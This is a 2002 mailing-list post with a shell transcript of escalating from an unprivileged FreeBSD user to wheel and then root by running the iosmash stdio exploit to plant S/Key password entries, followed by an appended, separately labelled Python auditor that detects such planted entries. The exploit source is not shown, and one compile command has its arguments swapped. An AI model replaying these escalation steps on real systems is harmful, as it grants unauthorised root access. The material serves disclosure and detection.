Vulnerability Development mailing list archives

full info on iosmash.c as non wheel user


From: John Scimone <jscimone () cc gatech edu>
Date: Tue, 23 Apr 2002 22:25:36 +0000

from phased....

I didn't think such would be necessary, but due to the high volume of emails it
has proved so. Below is a transcript of exploiting the stdio bug on FreeBSD as
a user not in the wheel group.

Welcome to FreeBSD!
id
uid=1000(d0tslash) gid=1000(d0tslash) groups=1000(d0tslash)

grep wheel /etc/group
wheel:*:0:root,akt0r-root,misterx

perl -pi -e 's/root /misterx /g' iosmash.c
gcc -o iosmash.c iosmash
./iosmash
Adding d0tslash:
<--- HIT CTRL-C --->
grep 98 iosmash.c
  s/key 98 snosoft2
  98: MASS OAT ROLL TOOL AGO CAM
        "\nmisterx 0099 snosoft2        6f648e8bd0e2988a     Apr 23,2666 01:02:03\n");
su misterx
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
%pwd
/usr/home/d0tslash
%id
uid=1001(misterx) gid=1001(misterx) groups=1001(misterx), 0(wheel),
1006(cvsusers)
%cd ~
%grep "root " iosmash.c
  decided to make a trivial exploit to easily get root :)
        "\nroot 0099 snosoft2   6f648e8bd0e2988a     Apr 23,2666 01:02:03\n");
%gcc -o iosmash iosmash.c
%./iosmash
Updating misterx:
Old key: snosoft2
<--- HIT CTRL-C --->
%su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes#
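As an added defender-side example (not part of this post or of iosmash), the Python below audits S/Key database entries laid out as in the transcript (user, sequence, seed, 16-hex-digit key, date, time) and flags what the planted lines above exhibit: a timestamp far in the future and one seed/key pair copied across accounts, noting wheel membership from /etc/group-style input. The sample entries and group line are constructed to mirror the transcript; the layout regex is an assumption about the file format.

```python
import re
from collections import Counter
from datetime import datetime
# Constructed S/Key database lines in the layout the transcript shows:
# user, sequence, seed, 16-hex-digit key, date, time.
SAMPLE_SKEYKEYS = """\
d0tslash 0098 snosoft2 0123456789abcdef Apr 23,2002 21:10:44
misterx 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03
root 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03
"""
# Constructed /etc/group excerpt mirroring the transcript's grep output.
SAMPLE_GROUP = "wheel:*:0:root,akt0r-root,misterx\n"
ENTRY_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+([0-9a-fA-F]{16})\s+"
                      r"([A-Za-z]{3} \d{1,2},\d{4})\s+(\d{2}:\d{2}:\d{2})$")

def parse_entries(text):
    # Lines that do not match the assumed layout are skipped, not guessed at.
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if not m:
            continue
        user, _seq, seed, key, day, clock = m.groups()
        stamp = datetime.strptime(f"{day} {clock}", "%b %d,%Y %H:%M:%S")
        entries.append({"user": user, "seed": seed, "key": key.lower(), "stamp": stamp})
    return entries

def wheel_members(group_text):
    for line in group_text.splitlines():
        fields = line.split(":")
        if fields[0] == "wheel" and len(fields) > 3:
            return {m for m in fields[3].split(",") if m}
    return set()

def audit(skeykeys_text, group_text, now=None):
    # user -> reasons for entries that look planted (future timestamp,
    # seed/key pair shared across accounts); privilege of the account is noted.
    now = now or datetime.now()
    entries = parse_entries(skeykeys_text)
    wheel = wheel_members(group_text)
    shared = Counter((e["seed"], e["key"]) for e in entries)
    findings = {}
    for e in entries:
        reasons = []
        if e["stamp"] > now:
            reasons.append("timestamp in the future")
        if shared[(e["seed"], e["key"])] > 1:
            reasons.append("seed/key pair shared with another account")
        if reasons and (e["user"] == "root" or e["user"] in wheel):
            reasons.append("account has wheel/root privileges")
        if reasons:
            findings[e["user"]] = reasons
    return findings
```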

